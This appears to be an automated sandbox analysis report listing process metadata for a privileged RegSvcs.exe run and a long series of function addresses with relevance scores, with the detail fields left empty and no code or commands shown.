Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 02:24:08 |
Start date: | 15/01/2025 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x940000 |
File size: | 45'984 bytes |
MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Function 00007FF849000F9C Relevance: 2.0, Instructions: 2003COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF848F3AEF2 Relevance: .2, Instructions: 185COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF8490013E0 Relevance: .1, Instructions: 144COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF848F3B025 Relevance: .1, Instructions: 141COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF848F3B126 Relevance: .1, Instructions: 72COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF848F3D1FF Relevance: .1, Instructions: 66COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF848F337B5 Relevance: .0, Instructions: 49COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF848F348D1 Relevance: .0, Instructions: 25COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF848F35395 Relevance: .0, Instructions: 22COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF848F3859F Relevance: .0, Instructions: 11COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF848F3D2A2 Relevance: .0, Instructions: 4COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF848F361B9 Relevance: .9, Instructions: 858COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF848F35180 Relevance: .1, Instructions: 103COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06730007 Relevance: 5.3, Strings: 3, Instructions: 1519COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06730040 Relevance: 5.3, Strings: 3, Instructions: 1507COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0673237F Relevance: 1.6, Strings: 1, Instructions: 305COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06732388 Relevance: 1.5, Strings: 1, Instructions: 291COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06732454 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067328F0 Relevance: 5.5, Strings: 4, Instructions: 482COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06733298 Relevance: 4.0, Strings: 3, Instructions: 251COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010509C9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067328E0 Relevance: 2.8, Strings: 2, Instructions: 349COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067369C8 Relevance: 1.5, Strings: 1, Instructions: 225COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067343F7 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738770 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0673268A Relevance: 1.4, Strings: 1, Instructions: 124COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06732697 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738600 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06735CF0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738800 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06735D00 Relevance: 1.3, Strings: 1, Instructions: 49COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738847 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06733752 Relevance: .2, Instructions: 225COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06734408 Relevance: .1, Instructions: 123COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067338BA Relevance: .1, Instructions: 101COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010508E0 Relevance: .1, Instructions: 84COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01050908 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06736990 Relevance: .1, Instructions: 67COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06733DF0 Relevance: .1, Instructions: 66COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067391D1 Relevance: .1, Instructions: 66COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06733EC0 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067384C0 Relevance: .1, Instructions: 57COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06732F57 Relevance: .1, Instructions: 55COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06732F68 Relevance: .0, Instructions: 47COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00FED809 Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06739200 Relevance: .0, Instructions: 44COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738330 Relevance: .0, Instructions: 41COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738A21 Relevance: .0, Instructions: 40COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00FED808 Relevance: .0, Instructions: 36COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06736D15 Relevance: .0, Instructions: 33COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06736961 Relevance: .0, Instructions: 30COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01050899 Relevance: .0, Instructions: 23COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06737F09 Relevance: .0, Instructions: 23COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738539 Relevance: .0, Instructions: 23COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738570 Relevance: .0, Instructions: 22COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06736700 Relevance: .0, Instructions: 20COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738AD0 Relevance: .0, Instructions: 19COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0673752B Relevance: .0, Instructions: 19COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06734A28 Relevance: .0, Instructions: 18COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067348F8 Relevance: .0, Instructions: 17COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06736880 Relevance: .0, Instructions: 17COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 010508A8 Relevance: .0, Instructions: 16COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06734628 Relevance: .0, Instructions: 16COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06735EF9 Relevance: .0, Instructions: 16COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738548 Relevance: .0, Instructions: 14COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06735CD0 Relevance: .0, Instructions: 13COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06736890 Relevance: .0, Instructions: 12COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738580 Relevance: .0, Instructions: 12COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06734F40 Relevance: .0, Instructions: 11COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06737537 Relevance: .0, Instructions: 11COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 067355D0 Relevance: .0, Instructions: 11COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 01050880 Relevance: .0, Instructions: 10COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738411 Relevance: .0, Instructions: 7COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06738420 Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06735CE0 Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06735960 Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 06734C50 Relevance: .0, Instructions: 4COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|